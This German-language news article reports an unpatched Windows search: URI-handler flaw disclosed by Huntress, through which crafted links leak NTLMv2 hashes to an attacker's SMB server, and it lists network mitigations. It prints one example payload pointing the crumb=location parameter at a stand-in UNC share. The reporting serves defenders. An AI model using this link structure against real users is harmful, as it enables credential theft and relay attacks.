Thought Leadership
Eine ungepatchte Schwachstelle im Windows-Search-Protokoll ermöglicht Hackern den Diebstahl von NTLMv2-Hashes über manipulierte Links.
Das IT-Sicherheitsunternehmen Huntress hat Details zu einer ungepatchten Schwachstelle in Microsoft Windows veröffentlicht. Das Problem liegt im sogenannten search: URI-Handler des Betriebssystems. Angreifer können diese Schwachstelle ausnutzen, indem sie einen speziell gestalteten Link in eine Webseite oder eine E-Mail einbetten. Klickt ein Benutzer auf diesen Link und bestätigt das Ausführen, wird das System des Opfers dazu veranlasst, eine Verbindung zu einem vom Angreifer kontrollierten SMB-Server aufzubauen. Bei diesem Verbindungsversuch überträgt Windows automatisch den NTLMv2-Hash des aktuellen Benutzers.
Cyberkriminelle können diesen abgefangenen Hash nutzen, um sich gegenüber anderen Diensten im Netzwerk als der betroffene Benutzer zu authentifizieren. Technisch wird der Angriff über den Parameter crumb=location innerhalb des Suchbefehls initiiert, beispielsweise über eine Befehlsstruktur wie search:query=test&crumb=location:\10.0.1.100\share.
Technische Parallelen zu bereits geschlossenen Sicherheitslücken
Der entdeckte Mechanismus weist starke Ähnlichkeiten zu früheren Sicherheitslücken auf, die von Microsoft bereits behoben wurden. Im April 2026 schloss das Unternehmen die Schwachstelle CVE-2026-33829, welche das Windows Snipping Tool betraf. Dort nutzte das System den Handler ms-screensketch: und akzeptierte einen ungeprüften filePath-Parameter, der ebenfalls zu einer ungewollten Verbindungsaufnahme über das Universal Naming Convention (UNC) Pfadformat führte.
Zudem dokumentierte das Sicherheitsunternehmen Varonis bereits im Februar 2024 unter der Kennung CVE-2023-35636, wie der crumb-Parameter zur Kompromittierung von Hashes missbraucht werden kann. Huntress-Forscher Andrew Schwartz zog einen direkten Vergleich zu diesen Vorfällen und erklärte: „Es nutzte denselben NTLM-Leckagemechanismus, erzeugte dasselbe Net-NTLMv2-Leck, hatte dieselben Voraussetzungen und trug dieselbe Moderate-Bewertung.“
Ablehnung einer offiziellen Sicherheitskorrektur durch Microsoft
Obwohl Huntress die Sicherheitslücke am 15. April 2026 im Rahmen einer verantwortungsvollen Offenlegung an Microsoft gemeldet hat, wird es für diesen Fehler vorerst keinen offiziellen Software-Patch geben. Der Hersteller lehnte eine Behebung des Problems explizit ab. In einer Stellungnahme teilte Microsoft den Forschern mit, dass die Schwachstelle lediglich mit der Risikostufe Moderate bewertet wird. Die Kriterien für die Bereitstellung eines regulären Sicherheitsupdates im Rahmen des Patchdays werden laut Microsoft nur von Fehlern erfüllt, die als Important oder Critical eingestuft sind. Da die Schwachstelle somit aktiv bleibt, können Angreifer sie weiterhin auf Systemen ausnutzen, die den Search-Handler standardmäßig verarbeiten.
Empfohlene Sicherheitsmaßnahmen für Netzwerke und Hosts
Da keine herstellerseitige Korrektur zur Verfügung steht, müssen Administratoren die Systeme durch manuelle Konfigurationen schützen. Folgende Maßnahmen reduzieren das Angriffsrisiko:
- Das Blockieren von ausgehendem SMB-Verkehr über die Ports TCP 445 und TCP 139 an der Netzwerkperipherie für alle Rechner, die keine externen Freigaben benötigen.
- Das firmenweite Erzwingen von SMB-Signierung (SMB Signing), damit abgefangene Hashes nicht für Relay-Angriffe gegen interne Server missbraucht werden können.
- Die vollständige Deaktivierung der NTLM-Authentifizierung in Active-Directory-Umgebungen, wo dies technisch ohne Kompatibilitätsprobleme möglich ist.
